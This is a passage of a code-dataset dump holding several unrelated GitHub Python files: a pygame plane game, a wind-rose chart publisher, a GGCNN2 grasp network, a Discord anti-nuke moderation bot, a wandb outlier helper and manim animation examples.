pygame.KEYDOWN or event.type == pygame.KEYUP:\n if event.key == 27: # 退出\n quit()\n exit()\n info.append('按下' if event.type == pygame.KEYDOWN else '松开')\n temp_state = 1 if event.type == pygame.KEYDOWN else 0\n if event.mod == 
pygame.KMOD_NONE:\n info.append('普通按键')\n if event.key in Symbol.KEYS:\n c = chr(event.key)\n info.append(c)\n status.update({c: temp_state})\n else:\n if event.mod & pygame.KMOD_LSHIFT:\n info.append('左上档键')\n if event.mod & pygame.KMOD_RSHIFT:\n info.append('右上档键')\n if event.mod & pygame.KMOD_SHIFT:\n info.append('上档键')\n info.append(event)\n info.append(status)\n show_visiable_key_info(screen, info)\n continue\n elif event.type == MOUSEMOTION:\n continue\n else:\n info.append(time.get_ticks())\n info.append(event)\n info.append(status)\n print_key_info(info)\n pygame.display.update()\n\n\nclass DishesFishOnTable:\n \"\"\"\n 饭桌上的碗筷背景 + ??鱼光标\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.__lunch__()\n\n def __lunch__(self):\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode((WindowGame.SCREEN_WIDTH, WindowGame.SCREEN_HEIGHT))\n pygame.display.set_caption(WindowGame.CAPTION)\n # 载入图片\n background = pygame.image.load('resources/back.jpg').convert()\n cursor = pygame.image.load('resources/cur.png').convert_alpha()\n while True:\n # 绘制背景\n screen.blit(background, (0, 0))\n # 鼠标位置\n x, y = pygame.mouse.get_pos()\n # 计算左上角位置\n x -= cursor.get_width() / 2\n y -= cursor.get_height() / 2\n # 绘制光标\n screen.blit(cursor, (x, y))\n # 更新屏幕\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == QUIT: # 退出\n quit()\n exit()\n elif event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:\n if event.key == 27: # 退出\n quit()\n exit()\n\n\nclass PlaneWar:\n \"\"\"\n 飞机大战\n \"\"\"\n # 最高分\n score_history = 0\n # 玩家当前获得分数\n score = 0\n # 暂停游戏标识,初始化2代表打开游戏(需要加载游戏画面),1代表暂停,0代表正常进行\n pause = 2\n\n class Enemy(pygame.sprite.Sprite):\n \"\"\"\n 敌人类\n \"\"\"\n\n def __init__(self, surface, position):\n super().__init__()\n self.image = surface\n self.rect = self.image.get_rect()\n self.rect.left = position[0]\n self.rect.top = position[1]\n self.speed = 6\n self.countdown = 0\n self.offset = 0\n\n def update(self):\n if PlaneWar.score < 0:\n PlaneWar.score = 0\n level = PlaneWar.score >> 3 # 作战等级\n self.rect.top += self.speed * ((level * 0.3) + 1)\n if self.rect.top > WindowGame.SCREEN_HEIGHT:\n self.kill()\n PlaneWar.score -= 1 # 错过敌机,扣除一个分数\n self.offset += level * level * self.speed * (\n randint(0, WindowGame.SCREEN_WIDTH) - (WindowGame.SCREEN_WIDTH >> 1)) # 左右移动敌机\n self.offset = int(self.offset) >> 1\n self.offset //= WindowGame.SCREEN_WIDTH\n if self.offset > (self.speed * ((level * 0.3) + 1)):\n self.offset = (self.speed * ((level * 0.3) + 1))\n elif self.offset < -(self.speed * ((level * 0.3) + 1)):\n self.offset = -(self.speed * ((level * 0.3) + 1))\n self.rect.left += self.offset\n if self.offset == -1:\n self.offset = 0\n if self.rect.left < 0: # 边界检查\n self.rect.left = 0 - self.rect.left\n elif self.rect.left > WindowGame.SCREEN_WIDTH - self.image.get_width():\n self.rect.left = WindowGame.SCREEN_WIDTH - self.image.get_width()\n\n class Bullet(pygame.sprite.Sprite):\n \"\"\"\n 子弹类\n \"\"\"\n\n def __init__(self, surface, position):\n super().__init__()\n self.image = surface\n self.rect = self.image.get_rect()\n self.rect.left = position[0] - self.rect.width / 2 + 2\n self.rect.top = position[1] - self.rect.height\n self.speed = 1\n self.directions = Symbol.DIRECTIONS\n self.offset = {\n self.directions[0]: 0,\n self.directions[1]: 0,\n self.directions[2]: 0,\n self.directions[3]: 0\n }\n\n def update(self):\n self.rect.top += (self.offset[K_DOWN] - self.offset[K_UP]) * \\\n self.speed * ((PlaneWar.score >> 3) * 0.3 + 1)\n if self.rect.top < 
-self.rect.height:\n self.kill()\n elif self.rect.top > WindowGame.SCREEN_HEIGHT:\n self.kill()\n self.rect.left += (self.offset[K_RIGHT] - self.offset[K_LEFT]) * \\\n self.speed * ((PlaneWar.score >> 3) * 0.3 + 1)\n if self.rect.left < -self.rect.width:\n self.kill()\n elif self.rect.left > WindowGame.SCREEN_WIDTH:\n self.kill()\n\n class Player(pygame.sprite.Sprite):\n \"\"\"\n 玩家飞机类\n \"\"\"\n\n def __init__(self, surface, position):\n \"\"\"\n 初始化\n :param surface: 飞机图片\n :param position: 飞机初始位置\n \"\"\"\n super().__init__()\n self.image = surface\n self.rect = self.image[0].get_rect()\n self.rect.left = position[0]\n self.rect.top = position[1]\n self.speed = 3\n self.directions = Symbol.DIRECTIONS\n self.offset = {\n self.directions[0]: 0,\n self.directions[1]: 0,\n self.directions[2]: 0,\n self.directions[3]: 0\n }\n self.bullet = pygame.sprite.Group()\n self.is_hit = False\n\n def move(self):\n \"\"\"\n 移动飞机\n :return:\n \"\"\"\n if self.is_hit: # 被击中,失去移动能力\n return\n # 高度平移\n self.rect.top += (self.offset[K_DOWN] - self.offset[K_UP]) * \\\n self.speed * ((PlaneWar.score >> 3) * 0.4 + 1)\n if self.rect.top < 200:\n self.rect.top = 200\n elif self.rect.top > WindowGame.SCREEN_HEIGHT - self.rect.height:\n self.rect.top = WindowGame.SCREEN_HEIGHT - self.rect.height\n # 左右平移\n self.rect.left += (self.offset[K_RIGHT] - self.offset[K_LEFT]) * \\\n self.speed * ((PlaneWar.score >> 3) * 0.4 + 1)\n if self.rect.left < 0:\n self.rect.left = 0\n elif self.rect.left > WindowGame.SCREEN_WIDTH - self.rect.width:\n self.rect.left = WindowGame.SCREEN_WIDTH - self.rect.width\n\n def single_shoot(self, bullet_img):\n if self.is_hit: # 被击中,失去射击能力\n return\n bullet = PlaneWar.Bullet(bullet_img, self.rect.midtop)\n bullet.offset[K_UP] = 9 # 射击速度\n self.bullet.add(bullet)\n\n def check_whitespace_quit(self, event):\n \"\"\"\n 检测暂停或退出事件\n :param event: pygame.event事件\n :return: 0,正常进行;1,暂停\n \"\"\"\n if event.type == QUIT: # 退出\n quit()\n exit()\n elif event.type == KEYDOWN:\n key_down = event.key\n if key_down == K_ESCAPE: # 退出\n quit()\n exit()\n elif key_down == K_SPACE:\n self.pause ^= 1\n return self.pause\n\n def start(self):\n \"\"\"\n 逻辑主入口\n :return:\n \"\"\"\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode((WindowGame.SCREEN_WIDTH, WindowGame.SCREEN_HEIGHT))\n pygame.display.set_caption(WindowGame.CAPTION)\n # 载入图片\n background = pygame.image.load('resources/background.png')\n gameover = pygame.image.load('resources/gameover.png')\n shoot_img = pygame.image.load('resources/shoot.png')\n # 剪切图片\n plane_imgs = [\n shoot_img.subsurface(pygame.Rect(0, 99, 102, 126)),\n shoot_img.subsurface(pygame.Rect(165, 360, 102, 126)),\n shoot_img.subsurface(pygame.Rect(165, 234, 102, 126)),\n shoot_img.subsurface(pygame.Rect(330, 624, 102, 126)),\n shoot_img.subsurface(pygame.Rect(330, 498, 102, 126)),\n shoot_img.subsurface(pygame.Rect(432, 624, 102, 126)),\n ]\n # 子弹图片\n bullet_img = shoot_img.subsurface(pygame.Rect(1004, 987, 9, 21))\n # 敌机图片\n enemy_img = shoot_img.subsurface(pygame.Rect(534, 612, 57, 43))\n enemy_destory_img = [\n shoot_img.subsurface(pygame.Rect(267, 347, 57, 43)),\n shoot_img.subsurface(pygame.Rect(873, 697, 57, 43)),\n shoot_img.subsurface(pygame.Rect(267, 296, 57, 43)),\n shoot_img.subsurface(pygame.Rect(930, 697, 57, 43))\n ]\n hero_pos = [185, 500]\n directions = Symbol.DIRECTIONS\n while True: # 新一局游戏\n player = PlaneWar.Player(plane_imgs, hero_pos)\n enemy = pygame.sprite.Group()\n enemy_destroy = pygame.sprite.Group()\n player_countdown = 1\n PlaneWar.score = 0\n 
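Stepping back from the game loop for a moment: the Enemy and Bullet classes above both follow the standard pygame sprite pattern, mutating self.rect in update() and calling self.kill() once off-screen so the sprite drops out of every Group holding it. A stripped-down, self-contained version of that pattern (sizes and speeds are arbitrary illustration values):

    import pygame

    class FallingSprite(pygame.sprite.Sprite):
        def __init__(self, pos, speed=6, screen_height=480):
            super().__init__()
            self.image = pygame.Surface((10, 10))
            self.rect = self.image.get_rect(topleft=pos)
            self.speed = speed
            self.screen_height = screen_height

        def update(self):
            self.rect.top += self.speed
            if self.rect.top > self.screen_height:
                self.kill()   # drops this sprite from every Group it belongs to

    # usage: group.update() moves all live sprites; group.draw(screen) skips killed ones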
temp_score = -1\n while True:\n pygame.time.Clock().tick(128)\n for event in pygame.event.get(): # 监听键盘和窗口退出事件\n self.check_whitespace_quit(event)\n if event.type == KEYDOWN:\n key_down = event.key\n if key_down in directions:\n player.offset[key_down] = 1\n elif event.type == KEYUP:\n key_up = event.key\n if key_up in directions:\n player.offset[key_up] = 0\n if self.pause == 1:\n continue\n player.move()\n # 绘制背景\n screen.blit(background, (0, 0))\n # 绘制飞机\n if player.is_hit: # 飞机被击中\n if time.get_ticks() % 24 == 0: # 开始爆炸动画\n player_countdown += 1\n if player_countdown > 5: # 爆炸画面播放完成,本轮游戏结束\n self.pause = 1\n break\n screen.blit(player.image[player_countdown], player.rect)\n else:\n screen.blit(player.image[0 if pygame.time.get_ticks() % 512 > 256 else 1], player.rect)\n # 绘制子弹\n if time.get_ticks() % 6 == 0:\n player.single_shoot(bullet_img)\n player.bullet.draw(screen)\n # 绘制敌机\n if time.get_ticks() % 32 == 0:\n enemy.add(PlaneWar.Enemy(enemy_img, (randint(0, WindowGame.SCREEN_WIDTH - enemy_img.get_width()),\n -enemy_img.get_height())))\n enemy.update()\n enemy.draw(screen)\n # 子弹与敌机碰撞\n enemy_destroy.add(pygame.sprite.groupcollide(enemy, player.bullet, True, True))\n # 飞机坠落切换动画\n for e_dest in enemy_destroy:\n screen.blit(enemy_destory_img[e_dest.countdown], e_dest.rect)\n if time.get_ticks() % 14 == 0:\n if e_dest.countdown < 3:\n e_dest.countdown += 1\n else:\n e_dest.kill()\n enemy_destroy.remove(e_dest)\n PlaneWar.score += 1 # 击毁敌机,分数+1\n # 战机被撞\n player_destroys = pygame.sprite.spritecollide(player, enemy, True)\n if len(player_destroys) > 0:\n enemy_destroy.add(player_destroys)\n player.is_hit = True\n # 玩家最终得分为:战机击毁前得分+战机撞击敌机数目\n temp_score = PlaneWar.score + len(player_destroys)\n # 显示分数\n if temp_score != -1:\n PlaneWar.score = temp_score\n if PlaneWar.score < 0:\n PlaneWar.score = 0\n screen.blit(\n pygame.font.SysFont(Symbol.Font.SimHei, 30).render(\"当前得分:\" + str(PlaneWar.score), 3, (255, 0, 0)),\n (30, 20))\n # 更新屏幕\n player.bullet.update()\n pygame.display.update()\n if self.pause == 2: # 打开游戏,加载一帧画面后静止\n self.pause = 1\n # 游戏结束画面\n PlaneWar.score = temp_score\n if PlaneWar.score < 0:\n PlaneWar.score = 0\n screen.blit(gameover, (0, 0))\n screen.blit(pygame.font.SysFont(Symbol.Font.SimHei, 30)\n .render(\"历史最高分:\" + str(PlaneWar.score_history), 3, (50, 50, 50)), (30, 30))\n screen.blit(pygame.font.SysFont(Symbol.Font.SimHei, 30)\n .render(\"本次得分:\" + str(PlaneWar.score), 3, (255, 255, 255)), (60, 70))\n if PlaneWar.score > PlaneWar.score_history:\n PlaneWar.score_history = PlaneWar.score\n screen.blit(pygame.font.SysFont(Symbol.Font.SimHei, 16).render(\"打破记录!\", 3, (255, 0, 0)), (380, 78))\n screen.blit(pygame.font.SysFont(Symbol.Font.SimHei, 70).render(\"恭喜您!\", 3, (0, 0, 200)), (125, 200))\n pygame.display.update()\n\n\nclass SysFonts:\n def show(self):\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode((1280, 640))\n pygame.display.set_caption('洒墨 - 系统字体展示')\n # 载入图片\n background = pygame.image.load('resources/background.png')\n # 绘制背景\n # screen.blit(background, (0, 0))\n r = 0 # 行\n c = 0 # 列\n n = 0\n for f in pygame.font.get_fonts():\n n += 1\n if (78 <= n) and (n <= 79):\n continue\n color_ = (255, 255, 255)\n if n == 0:\n color_ = (0, 255, 0)\n screen.blit(pygame.font.SysFont(str(f), 20).render(\"洒墨\" + str(f)[0:9], 3, color_),\n (160 * c, 21 * r))\n r += 1\n if r == 30:\n c += 1\n r = 0\n screen.blit(\n pygame.font.SysFont(str(pygame.font.get_fonts()[78]), 20).render(str(43543435)[0:14], 3, (255, 255, 255)),\n (160 * c, 21 * 28))\n screen.blit(\n 
pygame.font.SysFont(str(pygame.font.get_fonts()[79]), 20).render(str(\"hell撒旦法???\")[0:14], 3,\n (255, 255, 255)),\n (160 * c, 21 * 29))\n # 更新屏幕\n pygame.display.update()\n while True:\n pygame.time.Clock().tick(128)\n for event in pygame.event.get():\n PlaneWar().check_whitespace_quit(event)\n print(\"\", end=\"\")\n","repo_name":"0jiejie0/sum","sub_path":"pymdl2001/demo/demo_module.py","file_name":"demo_module.py","file_ext":"py","file_size_in_byte":17846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32197571149","text":"import os, sys\nimport json\nimport pandas as pd\nimport pg8000 as pg\nimport plotly.express as pe\nimport io, base64\nfrom PIL import Image\nfrom paho.mqtt import publish\nfrom datetime import datetime\nfrom pendulum import timezone\n\nsys.path.append(os.path.dirname(__file__))\n\nwith open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'config.json', 'r') as config_file:\n config = json.load(config_file)\n\n# define constants\nCANVAS_WIDTH = 1200\nCANVAS_HEIGHT = 675\n\nTEXT_FONT_FAMILY = 'Roboto'\n\n\ndef open_db_conn():\n conn = pg.connect(\n host=config['database']['host'],\n port=config['database']['port'],\n user=config['database']['user'],\n password=config['database']['password'],\n database=config['database']['db']\n )\n\n return conn\n\n\ndef close_db_conn(conn):\n conn.close()\n\n\ndef get_wind_rose_data(conn):\n print('Getting wind rose data...')\n sql = config['sql']['daily_wind_rose']\n print('SQL: {0}'.format(sql))\n\n pandas_table = pd.read_sql_query(sql, conn)\n\n return pandas_table\n\n\ndef build_wind_rose_figure(pandas_data_table):\n print('Building wind rose figure...')\n\n wind_rose_title = config['wind_rose']['title'].format(datetime.now(timezone('US/Eastern')).strftime('%Y-%m-%d %H:%M:%S %Z'))\n\n wind_rose = pe.bar_polar(\n pandas_data_table,\n r='frequency',\n theta='direction',\n color='strength',\n labels={\n 'strength': 'Wind Speed (MPH)'\n },\n height=CANVAS_HEIGHT,\n width=CANVAS_WIDTH\n )\n\n wind_rose.update_layout(\n # font_family=TEXT_FONT_FAMILY,\n title={\n 'text': wind_rose_title,\n 'x': 0.5\n },\n polar=dict(\n angularaxis=dict(\n categoryarray=['N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S', 'SSW', 'SW', 'WSW', 'W', 'WNW', 'NW', 'NNW'])\n )\n )\n\n return wind_rose\n\n\ndef encode_image(graph_figure):\n print('Encoding graph figure...')\n\n img_bytes = graph_figure.to_image(format='jpg')\n pil_img = Image.open(io.BytesIO(img_bytes))\n\n with io.BytesIO() as file_like_img:\n pil_img.save(file_like_img, 'JPEG')\n img_data = file_like_img.getvalue()\n\n encoded_image = base64.b64encode(img_data)\n encoded_image = encoded_image.decode('utf8')\n\n return encoded_image\n\n\ndef publish_tweet(image):\n print('Publishing tweet to MQTT...')\n message = \"Average Wind Speed and Direction Over Previous 24 Hours as of {0}\".format(datetime.now().astimezone(timezone('US/Eastern')).strftime('%Y-%m-%d %H:%M:%S %Z'))\n # build MQTT payload\n tweet = {\n # 'message': config['tweet']['message'],\n 'message': message,\n 'hash_tags': config['tweet']['hash_tags'],\n 'media': image\n }\n\n publish.single(\n topic=config['mqtt']['topic'],\n payload=json.dumps(tweet),\n hostname=config['mqtt']['host'],\n port=1883,\n client_id='wind_rose',\n qos=0\n )\n\n\ndef build_daily_wind_rose():\n print('Building daily wind rose...')\n db = open_db_conn()\n data = get_wind_rose_data(db)\n fig = build_wind_rose_figure(data)\n # fig.show() # only for testing\n enc_img = encode_image(fig)\n 
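A side note on the encode_image() step here: fig.to_image(format='jpg') already returns complete JPEG bytes, so the PIL open/save round-trip in the record above only re-compresses the same image. Base64-encoding those bytes directly yields an equally valid media payload (a shorter sketch, not the repo's code):

    import base64

    def encode_image_direct(graph_figure):
        # plotly/kaleido hands back a finished JPEG; encode it as-is
        img_bytes = graph_figure.to_image(format='jpg')
        return base64.b64encode(img_bytes).decode('utf8')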
publish_tweet(enc_img)\n\nif __name__ == '__main__':\n build_daily_wind_rose()","repo_name":"dad2cl3/ClimateStationMallory","sub_path":"airflow/dags/daily_tweets/daily_wind_rose.py","file_name":"daily_wind_rose.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32388768348","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass GGCNN2(nn.Module):\n def __init__(self, input_channels=1, filter_sizes=None, l3_k_size=5, dilations=None):\n super().__init__()\n\n if filter_sizes is None:\n filter_sizes = [16, # First set of convs\n 16, # Second set of convs\n 32, # Dilated convs\n 16] # Transpose Convs\n\n if dilations is None:\n dilations = [2, 4]\n\n self.features = nn.Sequential(\n # 4 conv layers.\n nn.Conv2d(input_channels, filter_sizes[0], kernel_size=11, stride=1, padding=5, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(filter_sizes[0], filter_sizes[0], kernel_size=5, stride=1, padding=2, bias=True),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(filter_sizes[0], filter_sizes[1], kernel_size=5, stride=1, padding=2, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(filter_sizes[1], filter_sizes[1], kernel_size=5, stride=1, padding=2, bias=True),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n # Dilated convolutions.\n nn.Conv2d(filter_sizes[1], filter_sizes[2], kernel_size=l3_k_size, dilation=dilations[0], stride=1, padding=(l3_k_size//2 * dilations[0]), bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(filter_sizes[2], filter_sizes[2], kernel_size=l3_k_size, dilation=dilations[1], stride=1, padding=(l3_k_size//2 * dilations[1]), bias=True),\n nn.ReLU(inplace=True),\n\n # Output layers\n nn.UpsamplingBilinear2d(scale_factor=2),\n nn.Conv2d(filter_sizes[2], filter_sizes[3], 3, padding=1),\n nn.ReLU(inplace=True),\n nn.UpsamplingBilinear2d(scale_factor=2),\n nn.Conv2d(filter_sizes[3], filter_sizes[3], 3, padding=1),\n nn.ReLU(inplace=True),\n )\n\n self.pos_output = nn.Conv2d(filter_sizes[3], 1, kernel_size=1)\n self.cos_output = nn.Conv2d(filter_sizes[3], 1, kernel_size=1)\n self.sin_output = nn.Conv2d(filter_sizes[3], 1, kernel_size=1)\n self.width_output = nn.Conv2d(filter_sizes[3], 1, kernel_size=1)\n\n for m in self.modules():\n if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d)):\n nn.init.xavier_uniform_(m.weight, gain=1)\n\n def forward(self, x):\n x = self.features(x)\n\n pos_output = self.pos_output(x)\n cos_output = self.cos_output(x)\n sin_output = self.sin_output(x)\n width_output = self.width_output(x)\n\n return pos_output, cos_output, sin_output, width_output\n","repo_name":"jessiezhang117-uni/Graduation-project","sub_path":"ggcnn_new_dataset/models/ggcnn2.py","file_name":"ggcnn2.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3820468095","text":"# -*- coding: utf-8 -*-\r\n\r\n# -----------------------------------------------------------\r\n# Logs analyzer and nuke protection from bots and administrators.\r\n#\r\n# (C) 2020 Tony De Freitas, Toulouse, France\r\n# Released under GNU Affero General Public License v3.0 (AGPLv3)\r\n# email defreitas.tony.pro@gmail.com\r\n# -----------------------------------------------------------\r\n\r\n\r\nimport discord\r\nimport asyncio\r\nfrom logs import logs as lg\r\nfrom datetime import datetime\r\nfrom cogs.affichage import embed\r\nfrom 
cogs.affichage import couleur\r\n\r\nlimits = {discord.AuditLogAction.channel_create : {\"per_minute\" : 5, \"per_hour\" : 12},\r\n discord.AuditLogAction.channel_delete : {\"per_minute\" : 5, \"per_hour\" : 12},\r\n discord.AuditLogAction.kick : {\"per_minute\" : 7, \"per_hour\" : 14},\r\n discord.AuditLogAction.ban : {\"per_minute\" : 7, \"per_hour\" : 14},\r\n discord.AuditLogAction.role_create : {\"per_minute\" : 6, \"per_hour\" : 12},\r\n discord.AuditLogAction.role_delete : {\"per_minute\" : 6, \"per_hour\" : 12}}\r\n\r\nasync def logs_channel_create(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.channel_create)\r\n\r\nasync def logs_channel_delete(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.channel_delete)\r\n\r\nasync def logs_member_remove(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.kick)\r\n\r\nasync def logs_role_create(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.role_create)\r\n\r\nasync def logs_role_delete(self, guild):\r\n return await logs_sorter(self, guild, discord.AuditLogAction.role_delete)\r\n\r\nasync def logs_sorter(self, guild, action):\r\n \"\"\" Checks that the author of the server's most recent audit log entry is not in violation \"\"\"\r\n\r\n async for entry in guild.audit_logs(limit=1):\r\n admin = entry.user\r\n\r\n logs = guild.audit_logs(limit=100, action=action, user=admin)\r\n\r\n last_minute = list()\r\n last_hour = list()\r\n\r\n async for entry in logs:\r\n if (datetime.utcnow() - entry.created_at).seconds < 60:\r\n last_minute.append(entry)\r\n last_hour.append(entry)\r\n elif (datetime.utcnow() - entry.created_at).seconds < 3600:\r\n last_hour.append(entry)\r\n\r\n if admin.id != 672521812315471883:\r\n if limits[action][\"per_minute\"] <= len(last_minute):\r\n return await admin_suspension(self, guild, admin, last_minute, action)\r\n elif limits[action][\"per_hour\"] <= len(last_hour):\r\n return await admin_suspension(self, guild, admin, last_hour, action)\r\n return None\r\n\r\nasync def admin_suspension(self, guild, admin, logs, action):\r\n \"\"\" Relieves a server administrator of their duties following an incident \"\"\"\r\n \r\n for role in admin.roles:\r\n if role.name != '@everyone':\r\n await admin.remove_roles(role)\r\n\r\n sentences = {discord.AuditLogAction.channel_create : \"Création du salon \",\r\n discord.AuditLogAction.channel_delete : \"Suppression du salon \",\r\n discord.AuditLogAction.kick : \"Kick du membre \",\r\n discord.AuditLogAction.ban : \"Ban du membre \",\r\n discord.AuditLogAction.role_create : \"Création du rôle \",\r\n discord.AuditLogAction.role_delete : \"Suppression du rôle \"}\r\n\r\n reason = str()\r\n if action == discord.AuditLogAction.channel_create or action == discord.AuditLogAction.role_create:\r\n for l in logs:\r\n reason += sentences[action] + \"`\" + str(l.after.name) + \"`\" + \" il y a \" + str((datetime.utcnow() - l.created_at).seconds) + \"secondes\" + \"\\n\"\r\n elif action == discord.AuditLogAction.channel_delete or action == discord.AuditLogAction.role_delete:\r\n for l in logs:\r\n reason += sentences[action] + \"`\" + str(l.before.name) + \"`\" + \" il y a \" + str((datetime.utcnow() - l.created_at).seconds) + \"secondes\" + \"\\n\"\r\n else:\r\n for l in logs:\r\n reason += sentences[action] + \"`\" + str(l.target) + \"`\" + \" il y a \" + str((datetime.utcnow() - l.created_at).seconds) + \"secondes\" + \"\\n\"\r\n\r\n await lg.member_log(self, admin, 
\"Suspension\", f\"Suite à une anomalie détectée dans les logs du serveur, je suis donc dans l'obligation de vous relever de vos fonctions pour assurer l'intégrité du serveur. Les membres du Staff ont été informés de l'incident et ils devront déterminer si la sanction que j'ai appliqué à votre encontre est légitime ou non.\\n\\nRaison :\\n{reason}\")\r\n await lg.staff_logs(self, guild, admin, guild.me, \"Suspension\", f\"Suite à une anomalie détectée dans les logs du serveur, j'ai suspendu l'administrateur afin de préserver l'intégrité du serveur. Tout administrateur ayant un niveau d'accès 3 sont priés de bien vouloir décider si la sanction que j'ai appliqué est justifié ou non. Merci de votre compréhension.\\n\\nRaison :\\n{reason}\")\r\n","repo_name":"Ventona666/Chat-bot-E.V.E","sub_path":"guard/nuke_guard.py","file_name":"nuke_guard.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1180948547","text":"list_1 = [2, 5, 7, 10]\nlist_2 = [3, 8, 4, 9]\nto_find = 56\n\n\ndef multiplication(find: int, lst_1: list, lst_2: list) -> tuple:\n for x in lst_1:\n for y in lst_2:\n result = x * y\n yield x, y, result\n if result == find:\n print('Found!!!')\n return\n\n\nfor num in multiplication(to_find, list_1, list_2):\n print(str(num)[1:-1])\n\n# зачет!\n","repo_name":"Mihalich2981/Python","sub_path":"Module26/02_refactoring/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8396935511","text":"from warnings import simplefilter\n\nimport numpy as np\n\nimport wandb\nfrom wandb.sklearn import utils\n\n# ignore all future warnings\nsimplefilter(action=\"ignore\", category=FutureWarning)\n\n\ndef outlier_candidates(regressor, X, y):\n # Fit a linear model to X and y to compute MSE\n regressor.fit(X, y)\n\n # Leverage is computed as the diagonal of the projection matrix of X\n leverage = (X * np.linalg.pinv(X).T).sum(1)\n\n # Compute the rank and the degrees of freedom of the OLS model\n rank = np.linalg.matrix_rank(X)\n df = X.shape[0] - rank\n\n # Compute the MSE from the residuals\n residuals = y - regressor.predict(X)\n mse = np.dot(residuals, residuals) / df\n\n # Compute Cook's distance\n residuals_studentized = residuals / np.sqrt(mse) / np.sqrt(1 - leverage)\n distance_ = residuals_studentized**2 / X.shape[1]\n distance_ *= leverage / (1 - leverage)\n\n # Compute the influence threshold rule of thumb\n influence_threshold_ = 4 / X.shape[0]\n outlier_percentage_ = sum(distance_ >= influence_threshold_) / X.shape[0]\n outlier_percentage_ *= 100.0\n\n distance_dict, count = [], 0\n for d in distance_:\n distance_dict.append(d)\n count += 1\n if utils.check_against_limit(\n count,\n \"outlier_candidates\",\n utils.chart_limit,\n ):\n break\n\n table = make_table(distance_dict, outlier_percentage_, influence_threshold_)\n chart = wandb.visualize(\"wandb/outliers/v1\", table)\n\n return chart\n\n\ndef make_table(distance, outlier_percentage, influence_threshold):\n columns = [\n \"distance\",\n \"instance_indicies\",\n \"outlier_percentage\",\n \"influence_threshold\",\n ]\n\n data = [\n [distance[i], i, utils.round_3(outlier_percentage), influence_threshold]\n for i in range(len(distance))\n ]\n\n table = wandb.Table(columns=columns, data=data)\n\n return 
table\n","repo_name":"wandb/wandb","sub_path":"wandb/sklearn/calculate/outlier_candidates.py","file_name":"outlier_candidates.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"29971956764","text":"#!/usr/bin/env python\n\nfrom manimlib.imports import *\n\n# To watch one of these scenes, run the following:\n# python -m manim example_scenes.py SquareToCircle -pl\n#\n# Use the flat -l for a faster rendering at a lower\n# quality.\n# Use -s to skip to the end and just save the final frame\n# Use the -p to have the animation (or image, if -s was\n# used) pop up once done.\n# Use -n to skip ahead to the n'th animation of a scene.\n# Use -r to specify a resolution (for example, -r 1080\n# for a 1920x1080 video)\n\n\nclass OpeningManimExample(Scene):\n def construct(self):\n title = TextMobject(\"This is some \\\\LaTeX\")\n basel = TexMobject(\n \"\\\\sum_{n=1}^\\\\infty \"\n \"\\\\frac{1}{n^2} = \\\\frac{\\\\pi^2}{6}\"\n )\n VGroup(title, basel).arrange(DOWN)\n self.play(\n Write(title),\n FadeInFrom(basel, UP),\n )\n self.wait()\n\n transform_title = TextMobject(\"That was a transform\")\n transform_title.to_corner(UP + LEFT)\n self.play(\n Transform(title, transform_title),\n LaggedStart(*map(FadeOutAndShiftDown, basel)),\n )\n self.wait()\n\n grid = NumberPlane()\n grid_title = TextMobject(\"This is a grid\")\n grid_title.scale(1.5)\n grid_title.move_to(transform_title)\n\n self.add(grid, grid_title) # Make sure title is on top of grid\n self.play(\n FadeOut(title),\n FadeInFromDown(grid_title),\n ShowCreation(grid, run_time=3, lag_ratio=0.1),\n )\n self.wait()\n\n grid_transform_title = TextMobject(\n \"That was a non-linear function \\\\\\\\\"\n \"applied to the grid\"\n )\n grid_transform_title.move_to(grid_title, UL)\n grid.prepare_for_nonlinear_transform()\n self.play(\n grid.apply_function,\n lambda p: p + np.array([\n np.sin(p[1]),\n np.sin(p[0]),\n 0,\n ]),\n run_time=3,\n )\n self.wait()\n self.play(\n Transform(grid_title, grid_transform_title)\n )\n self.wait()\n\n\nclass SquareToCircle(Scene):\n def construct(self):\n circle = Circle()\n square = Square()\n square.flip(RIGHT)\n square.rotate(-3 * TAU / 8)\n circle.set_fill(PINK, opacity=0.5)\n\n self.play(ShowCreation(square))\n self.play(Transform(square, circle))\n self.play(FadeOut(square))\n\n\nclass WarpSquare(Scene):\n def construct(self):\n square = Square()\n self.play(ApplyPointwiseFunction(\n lambda point: complex_to_R3(np.exp(R3_to_complex(point))),\n square\n ))\n self.wait()\n\n\nclass WriteStuff(Scene):\n def construct(self):\n example_text = TextMobject(\n \"This is a some text\",\n tex_to_color_map={\"text\": YELLOW}\n )\n example_tex = TexMobject(\n \"\\\\sum_{k=1}^\\\\infty {1 \\\\over k^2} = {\\\\pi^2 \\\\over 6}\",\n )\n group = VGroup(example_text, 